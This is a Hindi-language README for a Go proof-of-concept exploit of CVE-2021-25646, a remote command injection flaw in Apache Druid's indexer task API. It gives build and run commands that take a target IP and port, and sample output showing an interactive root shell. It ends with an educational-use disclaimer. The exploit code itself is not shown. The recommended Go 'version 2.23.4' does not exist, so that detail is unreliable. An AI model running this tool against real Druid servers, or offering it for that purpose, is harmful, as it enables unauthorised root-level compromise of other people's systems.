
CVE-2021-25646 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट, जो कमांड इंजेक्शन की अनुमति देता है।
इस रिपॉज़िटरी में CVE-2021-25646 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट शामिल है, जो Apache Druid में एक गंभीर रिमोट कोड निष्पादन भेद्यता है।
यह एक्सप्लॉइट गो में लिखा गया है और टर्मिनल के माध्यम से इंटरैक्टिव कमांड इंजेक्शन की अनुमति देता है।
आपके पास Go स्थापित होना आवश्यक है (संस्करण 2.23.4 अनुशंसित है)।
go build .
यह वर्तमान निर्देशिका में एक बाइनरी का निर्माण करेगा।
आप एक्सप्लॉइट को बाइनरी बनाकर या सीधे go run के साथ चला सकते हैं।
-i : लक्षित Druid सर्वर का IP पता (आवश्यक)-p : लक्षित Druid सर्वर का पोर्ट (आवश्यक)-proxy : प्रॉक्सी URL निर्दिष्ट करना (वैकल्पिक)निर्मित बाइनरी चलाएँ:
./cve -i 127.0.0.1 -p 8888
या सीधे गो के साथ चलाएँ:
go run main.go -i 127.0.0.1 -p 8888
$ ./cve -i 127.0.0.1 -p 8888
~ $ whoami
root
~ $ uname -a
Linux druid-server 4.15.0-123-generic #126-Ubuntu SMP ...
भेद्यता:
यह एक्सप्लॉइट Druid indexer घटक, विशेष रूप से task API में अनुचित इनपुट सत्यापन का दुरुपयोग करता है, जो क्राफ्ट किए गए JSON पेलोड के माध्यम से कमांड इंजेक्शन की अनुमति देता है।
संदर्भ:
यह सॉफ़्टवेयर केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।
लेखक इस कोड के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
किसी भी सिस्टम का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।